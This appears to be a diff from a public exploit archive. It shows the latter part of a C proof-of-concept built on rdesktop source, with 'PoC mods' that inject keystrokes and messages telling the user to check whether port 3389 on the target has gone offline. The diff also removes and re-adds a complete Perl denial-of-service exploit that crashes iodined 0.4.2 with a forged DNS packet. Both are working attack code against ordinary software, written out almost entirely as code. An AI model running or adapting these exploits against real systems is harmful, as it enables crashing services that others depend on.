(SEC_LOGON_INFO | SEC_ENCRYPT) : SEC_LOGON_INFO; + STREAM s; + + s = sec_init(sec_flags, 18 + len_domain + len_user + len_password + + len_program + len_directory + 10); + + out_uint32(s, 0); + out_uint32_le(s, flags); + out_uint16_le(s, len_domain); + out_uint16_le(s, len_user); + out_uint16_le(s, len_password); + out_uint16_le(s, len_program); + out_uint16_le(s, len_directory); + rdp_out_unistr(s, domain, len_domain); + rdp_out_unistr(s, user, len_user); + rdp_out_unistr(s, password, len_password); + rdp_out_unistr(s, program, len_program); + rdp_out_unistr(s, directory, len_directory); + + s_mark_end(s); + sec_send(s, sec_flags); +} + +/* Send a control PDU */ +static void +rdp_send_control(uint16 action) +{ + STREAM s; + + s = rdp_init_data(8); + + out_uint16_le(s, action); + out_uint16(s, 0); /* userid */ + out_uint32(s, 0); /* control id */ + + s_mark_end(s); + rdp_send_data(s, RDP_DATA_PDU_CONTROL); +} + +/* Send a synchronisation PDU */ +static void +rdp_send_synchronise(void) +{ + STREAM s; + + s = rdp_init_data(4); + + out_uint16_le(s, 1); /* type */ + out_uint16_le(s, 1002); + + s_mark_end(s); + rdp_send_data(s, RDP_DATA_PDU_SYNCHRONISE); +} + +/* Send a single input event */ +void +rdp_send_input(uint32 time, uint16 message_type, uint16 device_flags, uint16 param1, uint16 param2) +{ + STREAM s; + + s = rdp_init_data(16); + + out_uint16_le(s, 1); /* number of events */ + out_uint16(s, 0); /* pad */ + + out_uint32_le(s, time); + out_uint16_le(s, message_type); + out_uint16_le(s, device_flags); + out_uint16_le(s, param1); + out_uint16_le(s, param2); + + s_mark_end(s); + rdp_send_data(s, RDP_DATA_PDU_INPUT); +} + +/* Send an (empty) font information PDU */ +static void +rdp_send_fonts(uint16 seq) +{ + STREAM s; + + s = rdp_init_data(8); + + out_uint16(s, 0); /* number of fonts */ + out_uint16_le(s, 0x3e); /* unknown */ + out_uint16_le(s, seq); /* unknown */ + out_uint16_le(s, 0x32); /* entry size */ + + s_mark_end(s); + rdp_send_data(s, RDP_DATA_PDU_FONT2); 
+} + +/* Output general capability set */ +static void +rdp_out_general_caps(STREAM s) +{ + out_uint16_le(s, RDP_CAPSET_GENERAL); + out_uint16_le(s, RDP_CAPLEN_GENERAL); + + out_uint16_le(s, 1); /* OS major type */ + out_uint16_le(s, 3); /* OS minor type */ + out_uint16_le(s, 0x200); /* Protocol version */ + out_uint16(s, 0); /* Pad */ + out_uint16(s, 0); /* Compression types */ + out_uint16(s, 0); /* Pad */ + out_uint16(s, 0); /* Update capability */ + out_uint16(s, 0); /* Remote unshare capability */ + out_uint16(s, 0); /* Compression level */ + out_uint16(s, 0); /* Pad */ +} + +/* Output bitmap capability set */ +static void +rdp_out_bitmap_caps(STREAM s) +{ + out_uint16_le(s, RDP_CAPSET_BITMAP); + out_uint16_le(s, RDP_CAPLEN_BITMAP); + + out_uint16_le(s, 8); /* Preferred BPP */ + out_uint16_le(s, 1); /* Receive 1 BPP */ + out_uint16_le(s, 1); /* Receive 4 BPP */ + out_uint16_le(s, 1); /* Receive 8 BPP */ + out_uint16_le(s, 800); /* Desktop width */ + out_uint16_le(s, 600); /* Desktop height */ + out_uint16(s, 0); /* Pad */ + out_uint16(s, 0); /* Allow resize */ + out_uint16_le(s, bitmap_compression ? 1 : 0); /* Support compression */ + out_uint16(s, 0); /* Unknown */ + out_uint16_le(s, 1); /* Unknown */ + out_uint16(s, 0); /* Pad */ +} + +/* Output order capability set */ +static void +rdp_out_order_caps(STREAM s) +{ + uint8 order_caps[32]; + + + memset(order_caps, 0, 32); + order_caps[0] = 1; /* dest blt */ + order_caps[1] = 1; /* pat blt */ + order_caps[2] = 1; /* screen blt */ + order_caps[3] = 1; /* required for memblt? */ + order_caps[8] = 1; /* line */ + order_caps[9] = 1; /* line */ + order_caps[10] = 1; /* rect */ + order_caps[11] = (desktop_save == False ? 
0 : 1); /* desksave */ + order_caps[13] = 1; /* memblt */ + order_caps[14] = 1; /* triblt */ + order_caps[22] = 1; /* polyline */ + order_caps[27] = 1; /* text2 */ + out_uint16_le(s, RDP_CAPSET_ORDER); + out_uint16_le(s, RDP_CAPLEN_ORDER); + + out_uint8s(s, 20); /* Terminal desc, pad */ + out_uint16_le(s, 1); /* Cache X granularity */ + out_uint16_le(s, 20); /* Cache Y granularity */ + out_uint16(s, 0); /* Pad */ + out_uint16_le(s, 1); /* Max order level */ + out_uint16_le(s, 0x147); /* Number of fonts */ + out_uint16_le(s, 0x2a); /* Capability flags */ + out_uint8p(s, order_caps, 32); /* Orders supported */ + out_uint16_le(s, 0x6a1); /* Text capability flags */ + out_uint8s(s, 6); /* Pad */ + out_uint32_le(s, desktop_save == False ? 0 : 0x38400); /* Desktop cache size */ + out_uint32(s, 0); /* Unknown */ + out_uint32_le(s, 0x4e4); /* Unknown */ +} + +/* Output bitmap cache capability set */ +static void +rdp_out_bmpcache_caps(STREAM s) +{ + out_uint16_le(s, RDP_CAPSET_BMPCACHE); + out_uint16_le(s, RDP_CAPLEN_BMPCACHE); + + out_uint8s(s, 24); /* unused */ + out_uint16_le(s, 0x258); /* entries */ + out_uint16_le(s, 0x100); /* max cell size */ + out_uint16_le(s, 0x12c); /* entries */ + out_uint16_le(s, 0x400); /* max cell size */ + out_uint16_le(s, 0x106); /* entries */ + out_uint16_le(s, 0x1000); /* max cell size */ +} + +/* Output control capability set */ +static void +rdp_out_control_caps(STREAM s) +{ + out_uint16_le(s, RDP_CAPSET_CONTROL); + out_uint16_le(s, RDP_CAPLEN_CONTROL); + + out_uint16(s, 0); /* Control capabilities */ + out_uint16(s, 0); /* Remote detach */ + out_uint16_le(s, 2); /* Control interest */ + out_uint16_le(s, 2); /* Detach interest */ +} + +/* Output activation capability set */ +static void +rdp_out_activate_caps(STREAM s) +{ + out_uint16_le(s, RDP_CAPSET_ACTIVATE); + out_uint16_le(s, RDP_CAPLEN_ACTIVATE); + + out_uint16(s, 0); /* Help key */ + out_uint16(s, 0); /* Help index key */ + out_uint16(s, 0); /* Extended help key */ + 
out_uint16(s, 0); /* Window activate */ +} + +/* Output pointer capability set */ +static void +rdp_out_pointer_caps(STREAM s) +{ + out_uint16_le(s, RDP_CAPSET_POINTER); + out_uint16_le(s, RDP_CAPLEN_POINTER); + + out_uint16(s, 0); /* Colour pointer */ + out_uint16_le(s, 20); /* Cache size */ +} + +/* Output share capability set */ +static void +rdp_out_share_caps(STREAM s) +{ + out_uint16_le(s, RDP_CAPSET_SHARE); + out_uint16_le(s, RDP_CAPLEN_SHARE); + + out_uint16(s, 0); /* userid */ + out_uint16(s, 0); /* pad */ +} + +/* Output colour cache capability set */ +static void +rdp_out_colcache_caps(STREAM s) +{ + out_uint16_le(s, RDP_CAPSET_COLCACHE); + out_uint16_le(s, RDP_CAPLEN_COLCACHE); + + out_uint16_le(s, 6); /* cache size */ + out_uint16(s, 0); /* pad */ +} + +static uint8 canned_caps[] = { + 0x01, 0x00, 0x00, 0x00, 0x09, 0x04, 0x00, 0x00, 0x04, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0C, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x0C, 0x00, 0x08, 0x00, 0x01, + 0x00, 0x00, 0x00, 0x0E, 0x00, 0x08, 0x00, 0x01, 0x00, 0x00, 0x00, + 0x10, 0x00, 0x34, 0x00, 0xFE, + 0x00, 0x04, 0x00, 0xFE, 0x00, 0x04, 0x00, 0xFE, 0x00, 0x08, 0x00, + 0xFE, 0x00, 0x08, 0x00, 0xFE, + 0x00, 0x10, 0x00, 0xFE, 0x00, 0x20, 0x00, 0xFE, 0x00, 0x40, 0x00, + 0xFE, 0x00, 0x80, 0x00, 0xFE, + 0x00, 0x00, 0x01, 0x40, 0x00, 0x00, 0x08, 0x00, 0x01, 0x00, 0x01, + 0x02, 0x00, 0x00, 0x00 +}; + +/* Output unknown capability set */ +static void +rdp_out_unknown_caps(STREAM s) +{ + out_uint16_le(s, RDP_CAPSET_UNKNOWN); + out_uint16_le(s, 0x58); + + out_uint8p(s, canned_caps, RDP_CAPLEN_UNKNOWN - 4); +} + +/* Send a confirm 
active PDU */ +static void +rdp_send_confirm_active(void) +{ + STREAM s; + uint16 caplen = + RDP_CAPLEN_GENERAL + RDP_CAPLEN_BITMAP + RDP_CAPLEN_ORDER + + RDP_CAPLEN_BMPCACHE + RDP_CAPLEN_COLCACHE + + RDP_CAPLEN_ACTIVATE + RDP_CAPLEN_CONTROL + + RDP_CAPLEN_POINTER + RDP_CAPLEN_SHARE + RDP_CAPLEN_UNKNOWN + 4 /* w2k fix, why? */ ; + + s = rdp_init(14 + caplen + sizeof(RDP_SOURCE)); + + out_uint32_le(s, rdp_shareid); + out_uint16_le(s, 0x3ea); /* userid */ + out_uint16_le(s, sizeof(RDP_SOURCE)); + out_uint16_le(s, caplen); + + out_uint8p(s, RDP_SOURCE, sizeof(RDP_SOURCE)); + out_uint16_le(s, 0xd); /* num_caps */ + out_uint8s(s, 2); /* pad */ + + rdp_out_general_caps(s); + rdp_out_bitmap_caps(s); + rdp_out_order_caps(s); + rdp_out_bmpcache_caps(s); + rdp_out_colcache_caps(s); + rdp_out_activate_caps(s); + rdp_out_control_caps(s); + rdp_out_pointer_caps(s); + rdp_out_share_caps(s); + rdp_out_unknown_caps(s); + + s_mark_end(s); + rdp_send(s, RDP_PDU_CONFIRM_ACTIVE); +} + + + +/* Process incoming packets */ +void +rdp_main_loop(void) +{ + uint8 type; + STREAM s; + + while ((s = rdp_recv(&type)) != NULL) + { + switch (type) + { + case RDP_PDU_DEMAND_ACTIVE: + process_demand_active(s); + break; + + case RDP_PDU_DEACTIVATE: + break; + + case RDP_PDU_DATA: + process_data_pdu(s); + break; + case 0: + break; + + } + } +} + +/* Establish a connection up to the RDP layer */ +BOOL +rdp_connect(char *server, uint32 flags, char *domain, char *password, + char *command, char *directory) +{ + if (!sec_connect(server)) + return False; + + rdp_send_logon_info(flags, domain, username, password, command, directory); + return True; +} + +/* Disconnect from the RDP layer */ +void +rdp_disconnect(void) +{ + sec_disconnect(); +} + + + +/* Reset order state */ +void +reset_order_state(void) +{ + memset(&order_state, 0, sizeof(order_state)); + order_state.order_type = RDP_ORDER_PATBLT; +} + + +static void +reverse(uint8 * p, int len) +{ + int i, j; + uint8 temp; + + for (i = 0, j = len - 1; i < 
j; i++, j--) + { + temp = p[i]; + p[i] = p[j]; + p[j] = temp; + } +} + + +/* + * General purpose 48-byte transformation, using two 32-byte salts (generally, + * a client and server salt) and a global salt value used for padding. + * Both SHA1 and MD5 algorithms are used. + */ +void +sec_hash_48(uint8 * out, uint8 * in, uint8 * salt1, uint8 * salt2, uint8 salt) +{ + uint8 shasig[20]; + uint8 pad[4]; + SHA_CTX sha; + MD5_CTX md5; + int i; + + for (i = 0; i < 3; i++) + { + memset(pad, salt + i, i + 1); + + SHA1_Init(&sha); + SHA1_Update(&sha, pad, i + 1); + SHA1_Update(&sha, in, 48); + SHA1_Update(&sha, salt1, 32); + SHA1_Update(&sha, salt2, 32); + SHA1_Final(shasig, &sha); + + MD5_Init(&md5); + MD5_Update(&md5, in, 48); + MD5_Update(&md5, shasig, 20); + MD5_Final(&out[i * 16], &md5); + } +} + +/* + * Weaker 16-byte transformation, also using two 32-byte salts, but + * only using a single round of MD5. + */ +void +sec_hash_16(uint8 * out, uint8 * in, uint8 * salt1, uint8 * salt2) +{ + MD5_CTX md5; + + MD5_Init(&md5); + MD5_Update(&md5, in, 16); + MD5_Update(&md5, salt1, 32); + MD5_Update(&md5, salt2, 32); + MD5_Final(out, &md5); +} + +/* Reduce key entropy from 64 to 40 bits */ +static void +sec_make_40bit(uint8 * key) +{ + key[0] = 0xd1; + key[1] = 0x26; + key[2] = 0x9e; +} + +/* Generate a session key and RC4 keys, given client and server randoms */ +static void +sec_generate_keys(uint8 * client_key, uint8 * server_key, int rc4_key_size) +{ + uint8 session_key[48]; + uint8 temp_hash[48]; + uint8 input[48]; + + /* Construct input data to hash */ + memcpy(input, client_key, 24); + memcpy(input + 24, server_key, 24); + + /* Generate session key - two rounds of sec_hash_48 */ + sec_hash_48(temp_hash, input, client_key, server_key, 65); + sec_hash_48(session_key, temp_hash, client_key, server_key, 88); + + /* Store first 16 bytes of session key, for generating signatures */ + memcpy(sec_sign_key, session_key, 16); + + /* Generate RC4 keys */ + 
sec_hash_16(sec_decrypt_key, &session_key[16], client_key, server_key); + sec_hash_16(sec_encrypt_key, &session_key[32], client_key, server_key); + + if (rc4_key_size == 1) + { + + sec_make_40bit(sec_sign_key); + sec_make_40bit(sec_decrypt_key); + sec_make_40bit(sec_encrypt_key); + rc4_key_len = 8; + } + else + { + + rc4_key_len = 16; + } + + /* Save initial RC4 keys as update keys */ + memcpy(sec_decrypt_update_key, sec_decrypt_key, 16); + memcpy(sec_encrypt_update_key, sec_encrypt_key, 16); + + /* Initialise RC4 state arrays */ + RC4_set_key(&rc4_decrypt_key, rc4_key_len, sec_decrypt_key); + RC4_set_key(&rc4_encrypt_key, rc4_key_len, sec_encrypt_key); +} + +static uint8 pad_54[40] = { + 54, 54, 54, 54, 54, 54, 54, 54, 54, 54, 54, 54, 54, 54, 54, 54, 54, + 54, 54, 54, + 54, 54, 54, 54, 54, 54, 54, 54, 54, 54, 54, 54, 54, 54, 54, 54, 54, + 54, 54, 54 +}; + +static uint8 pad_92[48] = { + 92, 92, 92, 92, 92, 92, 92, 92, 92, 92, 92, 92, 92, 92, 92, 92, 92, + 92, 92, 92, 92, 92, 92, 92, + 92, 92, 92, 92, 92, 92, 92, 92, 92, 92, 92, 92, 92, 92, 92, 92, 92, + 92, 92, 92, 92, 92, 92, 92 +}; + + +/* Transmit secure transport packet */ +void +sec_send(STREAM s, uint32 flags) +{ + int datalen; + + s_pop_layer(s, sec_hdr); + if (!licence_issued || (flags & SEC_ENCRYPT)) + out_uint32_le(s, flags); + + if (flags & SEC_ENCRYPT) + { + flags &= ~SEC_ENCRYPT; + datalen = s->end - s->p - 8; + +#if WITH_DEBUG + DEBUG(("Sending encrypted packet:\n")); + hexdump(s->p + 8, datalen); +#endif + + + } + + mcs_send(s); +} + + +/* Perform an RSA public key encryption operation */ +static void +sec_rsa_encrypt(uint8 * out, uint8 * in, int len, uint8 * modulus, uint8 * exponent) +{ + BN_CTX *ctx; + BIGNUM mod, exp, x, y; + uint8 inr[SEC_MODULUS_SIZE]; + int outlen; + + reverse(modulus, SEC_MODULUS_SIZE); + reverse(exponent, SEC_EXPONENT_SIZE); + memcpy(inr, in, len); + reverse(inr, len); + + ctx = BN_CTX_new(); + BN_init(&mod); + BN_init(&exp); + BN_init(&x); + BN_init(&y); + + 
BN_bin2bn(modulus, SEC_MODULUS_SIZE, &mod); + BN_bin2bn(exponent, SEC_EXPONENT_SIZE, &exp); + BN_bin2bn(inr, len, &x); + BN_mod_exp(&y, &x, &exp, &mod, ctx); + outlen = BN_bn2bin(&y, out); + reverse(out, outlen); + if (outlen < SEC_MODULUS_SIZE) + memset(out + outlen, 0, SEC_MODULUS_SIZE - outlen); + + BN_free(&y); + BN_clear_free(&x); + BN_free(&exp); + BN_free(&mod); + BN_CTX_free(ctx); +} + +/* Initialise secure transport packet */ +STREAM +sec_init(uint32 flags, int maxlen) +{ + int hdrlen; + STREAM s; + + if (!licence_issued) + hdrlen = (flags & SEC_ENCRYPT) ? 12 : 4; + else + hdrlen = (flags & SEC_ENCRYPT) ? 12 : 0; + s = mcs_init(maxlen + hdrlen); + s_push_layer(s, sec_hdr, hdrlen); + + return s; +} + + + + +/* Output connect initial data blob */ +static void +sec_out_mcs_data(STREAM s) +{ + int hostlen = 2 * strlen(hostname); + + if (hostlen > 30) + hostlen = 30; + + out_uint16_be(s, 5); /* unknown */ + out_uint16_be(s, 0x14); + out_uint8(s, 0x7c); + out_uint16_be(s, 1); + + out_uint16_be(s, (158 | 0x8000)); /* remaining length */ + + out_uint16_be(s, 8); /* length? */ + out_uint16_be(s, 16); + out_uint8(s, 0); + out_uint16_le(s, 0xc001); + out_uint8(s, 0); + + out_uint32_le(s, 0x61637544); /* "Duca" ?! */ + out_uint16_be(s, (144 | 0x8000)); /* remaining length */ + + /* Client information */ + out_uint16_le(s, SEC_TAG_CLI_INFO); + out_uint16_le(s, 136); /* length */ + out_uint16_le(s, 1); + out_uint16_le(s, 8); + out_uint16_le(s, width); + out_uint16_le(s, height); + out_uint16_le(s, 0xca01); + out_uint16_le(s, 0xaa03); + out_uint32_le(s, keylayout); + out_uint32_le(s, 419); /* client build? we are 419 compatible :-) */ + + /* Unicode name of client, padded to 32 bytes */ + rdp_out_unistr(s, hostname, hostlen); + out_uint8s(s, 30 - hostlen); + + out_uint32_le(s, 4); + out_uint32(s, 0); + out_uint32_le(s, 12); + out_uint8s(s, 64); /* reserved? 
4 + 12 doublewords */ + + out_uint16_le(s, 0xca01); + out_uint16(s, 0); + + /* Client encryption settings */ + out_uint16_le(s, SEC_TAG_CLI_CRYPT); + out_uint16_le(s, 8); /* length */ + out_uint32_le(s, encryption ? 0x3 : 0); /* encryption supported, 128-bit supported */ + s_mark_end(s); +} + +/* Parse a public key structure */ +static BOOL +sec_parse_public_key(STREAM s, uint8 ** modulus, uint8 ** exponent) +{ + uint32 magic, modulus_len; + + in_uint32_le(s, magic); + if (magic != SEC_RSA_MAGIC) + { + error("RSA magic 0x%x\n", magic); + return False; + } + + in_uint32_le(s, modulus_len); + if (modulus_len != SEC_MODULUS_SIZE + SEC_PADDING_SIZE) + { + error("modulus len 0x%x\n", modulus_len); + return False; + } + + in_uint8s(s, 8); /* modulus_bits, unknown */ + in_uint8p(s, *exponent, SEC_EXPONENT_SIZE); + in_uint8p(s, *modulus, SEC_MODULUS_SIZE); + in_uint8s(s, SEC_PADDING_SIZE); + + return s_check(s); +} + +/* Parse a crypto information structure */ +static BOOL +sec_parse_crypt_info(STREAM s, uint32 * rc4_key_size, + uint8 ** server_random, uint8 ** modulus, uint8 ** exponent) +{ + uint32 crypt_level, random_len, rsa_info_len; + uint16 tag, length; + uint8 *next_tag, *end; + + in_uint32_le(s, *rc4_key_size); /* 1 = 40-bit, 2 = 128-bit */ + in_uint32_le(s, crypt_level); /* 1 = low, 2 = medium, 3 = high */ + if (crypt_level == 0) /* no encryptation */ + return False; + in_uint32_le(s, random_len); + in_uint32_le(s, rsa_info_len); + + if (random_len != SEC_RANDOM_SIZE) + { + error("random len %d\n", random_len); + return False; + } + + in_uint8p(s, *server_random, random_len); + + /* RSA info */ + end = s->p + rsa_info_len; + if (end > s->end) + return False; + + in_uint8s(s, 12); /* unknown */ + + while (s->p < end) + { + in_uint16_le(s, tag); + in_uint16_le(s, length); + + next_tag = s->p + length; + + switch (tag) + { + case SEC_TAG_PUBKEY: + if (!sec_parse_public_key(s, modulus, exponent)) + return False; + + break; + + case SEC_TAG_KEYSIG: + /* Is this a 
Microsoft key that we just got? */ + /* Care factor: zero! */ + break; + } + + s->p = next_tag; + } + + return s_check_end(s); +} + +/* Process crypto information blob */ +static void +sec_process_crypt_info(STREAM s) +{ + uint8 *server_random, *modulus, *exponent; + uint8 client_random[SEC_RANDOM_SIZE]; + uint32 rc4_key_size; + + if (!sec_parse_crypt_info(s, &rc4_key_size, &server_random, &modulus, &exponent)) + return; + + /* Generate a client random, and hence determine encryption keys */ + sec_rsa_encrypt(sec_crypted_random, client_random, SEC_RANDOM_SIZE, modulus, exponent); + sec_generate_keys(client_random, server_random, rc4_key_size); +} + +/* Process connect response data blob */ +static void +sec_process_mcs_data(STREAM s) +{ + uint16 tag, length; + uint8 *next_tag; + uint8 len; + + in_uint8s(s, 21); /* header */ + in_uint8(s, len); + if (len & 0x80) + in_uint8(s, len); + + while (s->p < s->end) + { + in_uint16_le(s, tag); + in_uint16_le(s, length); + + if (length <= 4) + return; + + next_tag = s->p + length - 4; + + switch (tag) + { + case SEC_TAG_SRV_INFO: + case SEC_TAG_SRV_3: + break; + + case SEC_TAG_SRV_CRYPT: + sec_process_crypt_info(s); + break; + } + + s->p = next_tag; + } +} + +/* Receive secure transport packet */ +STREAM +sec_recv(void) +{ + uint32 sec_flags; + STREAM s; + + while ((s = mcs_recv()) != NULL) + { + if (encryption || !licence_issued) + { + in_uint32_le(s, sec_flags); + + if (sec_flags & SEC_LICENCE_NEG) + { + licence_process(s); + continue; + } + + if (sec_flags & SEC_ENCRYPT) + { + in_uint8s(s, 8); /* signature */ + + } + } + + return s; + } + + return NULL; +} + +/* Establish a secure connection */ +BOOL +sec_connect(char *server) +{ + struct stream mcs_data; + + /* We exchange some RDP data during the MCS-Connect */ + mcs_data.size = 512; + mcs_data.p = mcs_data.data = xmalloc(mcs_data.size); + sec_out_mcs_data(&mcs_data); + + if (!mcs_connect(server, &mcs_data)) + return False; + + sec_process_mcs_data(&mcs_data); + + 
xfree(mcs_data.data); + return True; +} + +/* Disconnect a connection */ +void +sec_disconnect(void) +{ + mcs_disconnect(); +} + + +/* Initialise TCP transport data packet */ +STREAM +tcp_init(int maxlen) +{ + if (maxlen > out.size) + { + out.size = maxlen; + } + + out.p = out.data; + out.end = out.data + out.size; + return &out; +} + +/* Send TCP transport data packet */ +void +tcp_send(STREAM s) +{ + int length = s->end - s->data; + int sent, total = 0; + + while (total < length) + { + sent = send(sock, s->data + total, length - total, 0); + if (sent <= 0) + { + fprintf(stderr, "\n[=] Check port 3389 on target host. It should be offline.\n\n"); + return; + } + + total += sent; + } +} + +/* Receive a message on the TCP layer */ +STREAM +tcp_recv(int length) +{ + int rcvd = 0; + + if (length > in.size) + { + + in.size = length; + } + + in.end = in.p = in.data; + + while (length > 0) + { + if (!ui_select(sock)) + /* User quit */ + return NULL; + + rcvd = recv(sock, in.end, length, 0); + if (rcvd == -1) + { + error("recv: %s", strerror(errno)); + return NULL; + } + + in.end += rcvd; + length -= rcvd; + } + + return ∈ +} + +/* Establish a connection on the TCP layer */ +BOOL +tcp_connect(char *server) +{ + struct hostent *nslookup; + struct sockaddr_in servaddr; + int true = 1; + + if ((nslookup = gethostbyname(server)) != NULL) + { + memcpy(&servaddr.sin_addr, nslookup->h_addr, sizeof(servaddr.sin_addr)); + } + else if ((servaddr.sin_addr.s_addr = inet_addr(server)) == INADDR_NONE) + { + error("%s: unable to resolve host\n", server); + return False; + } + + if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0) + { + error("socket: %s\n", strerror(errno)); + return False; + } + + servaddr.sin_family = AF_INET; + servaddr.sin_port = htons(tcp_port_rdp); + + if (connect(sock, (struct sockaddr *) &servaddr, sizeof(struct sockaddr)) < 0) + { + error("connect: %s\n", strerror(errno)); + close(sock); + return False; + } + + setsockopt(sock, IPPROTO_TCP, TCP_NODELAY, (void *) 
&true, sizeof(true)); + + in.size = 4096; + in.data = xmalloc(in.size); + + out.size = 4096; + out.data = xmalloc(out.size); + + return True; +} + +/* Disconnect on the TCP layer */ +void +tcp_disconnect(void) +{ + fprintf(stderr, "\n[=] Done. Check port 3389 on the remote host.\n\n"); + close(sock); +} + + + +/* Returns 0 after user quit, 1 otherwise */ +int +ui_select(int rdp_socket) +{ + int n = (rdp_socket > x_socket) ? rdp_socket + 1 : x_socket + 1; + fd_set rfds; + + + +// Begin PoC mods + XEvent xevent; + KeySym keysym; + uint32 ev_time; + key_translation tr; + if (ix-- >= 0) + { return 1; } + ev_time = time(NULL); + handle_special_keys(keysym, xevent.xkey.state, ev_time, True); + tr = xkeymap_translate_key(keysym, xevent.xkey.keycode, xevent.xkey.state); + ensure_remote_modifiers(ev_time, tr); + rdp_send_scancode(ev_time, RDP_KEYPRESS, tr.scancode); +// End PoC mods + + + + FD_ZERO(&rfds); + while (True) + { + /* Process any events already waiting */ + +// if (!xwin_process_events()) +// /* User quit */ +// return 0; + + FD_ZERO(&rfds); + FD_SET(rdp_socket, &rfds); + FD_SET(x_socket, &rfds); + + switch (select(n, &rfds, NULL, NULL, NULL)) + { + case -1: + error("select: %s\n", strerror(errno)); + + case 0: + continue; + } + + if (FD_ISSET(rdp_socket, &rfds)) + return 1; + } +} + + +key_translation +xkeymap_translate_key(uint32 keysym, unsigned int keycode, unsigned int state) +{ + key_translation tr = { 0, 0 }; + + tr = keymap[keysym & KEYMAP_MASK]; + + if (tr.modifiers & MapInhibitMask) + { + + tr.scancode = 0; + return tr; + } + + if (tr.modifiers & MapLocalStateMask) + { + /* The modifiers to send for this key should be obtained + from the local state. Currently, only shift is implemented. 
*/ + if (state & ShiftMask) + { + tr.modifiers = MapLeftShiftMask; + } + } + + if (tr.scancode != 0) + { + return tr; + } + + if (keymap_loaded) + + + /* not in keymap, try to interpret the raw scancode */ + if ((keycode >= min_keycode) && (keycode <= 0x60)) + { + tr.scancode = keycode - min_keycode; + + /* The modifiers to send for this key should be + obtained from the local state. Currently, only + shift is implemented. */ + if (state & ShiftMask) + { + tr.modifiers = MapLeftShiftMask; + } + + + } + else + { + + } + + return tr; +} + + +static void +update_modifier_state(uint8 scancode, BOOL pressed) +{ +#ifdef WITH_DEBUG_KBD + uint16 old_modifier_state; + + old_modifier_state = remote_modifier_state; +#endif + + switch (scancode) + { + case SCANCODE_CHAR_LSHIFT: + MASK_CHANGE_BIT(remote_modifier_state, MapLeftShiftMask, pressed); + break; + case SCANCODE_CHAR_RSHIFT: + MASK_CHANGE_BIT(remote_modifier_state, MapRightShiftMask, pressed); + break; + case SCANCODE_CHAR_LCTRL: + MASK_CHANGE_BIT(remote_modifier_state, MapLeftCtrlMask, pressed); + break; + case SCANCODE_CHAR_RCTRL: + MASK_CHANGE_BIT(remote_modifier_state, MapRightCtrlMask, pressed); + break; + case SCANCODE_CHAR_LALT: + MASK_CHANGE_BIT(remote_modifier_state, MapLeftAltMask, pressed); + break; + case SCANCODE_CHAR_RALT: + MASK_CHANGE_BIT(remote_modifier_state, MapRightAltMask, pressed); + break; + case SCANCODE_CHAR_LWIN: + MASK_CHANGE_BIT(remote_modifier_state, MapLeftWinMask, pressed); + break; + case SCANCODE_CHAR_RWIN: + MASK_CHANGE_BIT(remote_modifier_state, MapRightWinMask, pressed); + break; + case SCANCODE_CHAR_NUMLOCK: + /* KeyReleases for NumLocks are sent immediately. 
Toggle the + modifier state only on Keypress */ + if (pressed) + { + BOOL newNumLockState; + newNumLockState = + (MASK_HAS_BITS + (remote_modifier_state, MapNumLockMask) == False); + MASK_CHANGE_BIT(remote_modifier_state, + MapNumLockMask, newNumLockState); + } + break; + } + +#ifdef WITH_DEBUG_KBD + if (old_modifier_state != remote_modifier_state) + { + + old_modifier_state, pressed)); + + } +#endif + +} + + +/* free */ +void +xfree(void *mem) +{ + free(mem); +} + +/* report an error */ +void +error(char *format, ...) +{ + va_list ap; + + fprintf(stderr, "[=] Error: "); + + va_start(ap, format); + vfprintf(stderr, format, ap); + va_end(ap); +} + + + +/* malloc; exit if out of memory */ +void * +xmalloc(int size) +{ + void *mem = malloc(size); + if (mem == NULL) + { + error("xmalloc %d\n", size); + exit(1); + } + return mem; +} + +// milw0rm.com [2009-04-17] diff --git a/platforms/linux/dos/8544.pl b/platforms/linux/dos/8544.pl index 9a1ea8c75..d928de036 100755 --- a/platforms/linux/dos/8544.pl +++ b/platforms/linux/dos/8544.pl 
@@ -1,58 +1,58 @@
-#!/usr/bin/perl
-
-# iodined <= 0.4.2 DoS exploit
-#
-# by Albert Sellares
-# http://www.wekk.net
-# 2009-04-26
-#
-# This exploit shuts down the iodined daemon using a forged DNS packet.
-# It works on the last debian stable version (0.4.2-2).
-#
-# It produces a segmentation fault on the daemon side.
-
-use IO::Socket;
-use strict;
-
-my $pkt_header = "\x00\x01\x01\x00\x00\x01\x00\x00\x00\x00\x00\x01\x0b\x56\x63\x61\x61\x61\x69\x61\x71\x61\x61\x64";
-my $pkt_footer = "\x00\x00\x0a\x00\x01\x00\x00\x29\x10\x00\x00\x00\x80\x00\x00\x00";
-
-if ($#ARGV != 1) {
- print "shoot-iodined <= 0.4.2 - \n".
- "=============================================\n".
- "Usage: ./shoot-iodined host domain\n".
- " * host: Host addr where iodined is listening\n".
- " * domain: Domain that iodined is using\n";
- exit 1;
-}
-
-my $host = $ARGV[0];
-my $domain = $ARGV[1];
-my $template = 'a24';
-my @pkt;;
-my $l;
-
-push(@pkt, $pkt_header);
-my @chunk = split(/\./, $domain);
-
-foreach (@chunk) {
- $l = length $_;
- $template = $template . 'Ca'. $l;
- push(@pkt, $l);
- push(@pkt, $_);
-}
-$template = $template . 'a16';
-push(@pkt, $pkt_footer);
-
-$| = 1;
-print " [*] Shooting iodined at host $host...\n";
-
-my $sock = IO::Socket::INET->new( Proto => 'udp',
- PeerPort => 53,
- PeerAddr => $host) or die "Creating socket: $!\n";
-
-$sock->send(pack($template, @pkt)) or die "send: $!";
-
-print " [*] If the domain was ok, now the service is down.\n";
-
-# milw0rm.com [2009-04-27]
+#!/usr/bin/perl
+
+# iodined <= 0.4.2 DoS exploit
+#
+# by Albert Sellares
+# http://www.wekk.net
+# 2009-04-26
+#
+# This exploit shuts down the iodined daemon using a forged DNS packet.
+# It works on the last debian stable version (0.4.2-2).
+#
+# It produces a segmentation fault on the daemon side.
+
+use IO::Socket;
